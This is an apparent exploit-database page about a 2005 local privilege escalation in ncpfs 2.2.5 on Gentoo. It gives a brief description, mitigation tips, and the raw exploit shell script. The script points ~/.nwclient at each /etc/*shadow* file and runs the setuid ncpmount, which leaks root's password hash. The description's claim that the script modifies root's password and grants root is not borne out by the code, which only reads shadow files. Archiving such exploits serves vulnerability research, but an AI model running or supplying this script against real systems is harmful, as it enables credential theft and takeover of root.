header-logo
Suggest Exploit
vendor:
by:
super
7.5
CVSS
HIGH
Local Privilege Escalation
CWE
Product Name:
Affected Version From: ncpfs 2.2.5
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2005

head1 Local Privilege Escalation

This exploit allows an attacker to escalate their privileges on a system by modifying the root's encrypted password. The exploit is specific to the ncpfs 2.2.5 version on Gentoo. It requires the attacker to have access to the system and execute the provided script. The script will create a temporary directory, modify the ~/.nwclient file, mount the directory using ncpmount, and then remove the temporary directory and restore the ~/.nwclient file. If successful, the attacker will have root privileges. For more details, refer to milw0rm.com.

Mitigation:

Upgrade to a patched version of ncpfs. Remove any unnecessary setuid/setgid binaries. Limit access to sensitive files and directories.
Source

Exploit-DB raw data:

#!/bin/sh
## Had to remove local -r to get it to work via sh on my box
## Root's encrypted password was in toupper form but the
## super stated it worked fine for him (Gentoo with ncpfs 2.2.5)
## If it worked for you send an email to info@milw0rm.com /str0ke

(echo  'head1 by super'
 echo -e '==============\n'
 (function head1(){
   (local -r MNTDIR=~/mnt.$$
     (mv ~/.nwclient ~/.nwclient.temp
       ln -sf $1 ~/.nwclient
       mkdir $MNTDIR)2>/dev/null
     (echo $1
       ncpmount $MNTDIR
       echo)
     (rmdir $MNTDIR
       rm ~/.nwclient
       mv .nwclient.temp .nwclient)2>/dev/null)}
 (for i in /etc/*shadow*
   do head1 $i
   done)))#

# milw0rm.com [2005-01-30]

Navigation

Suggest Exploit

Services By CQR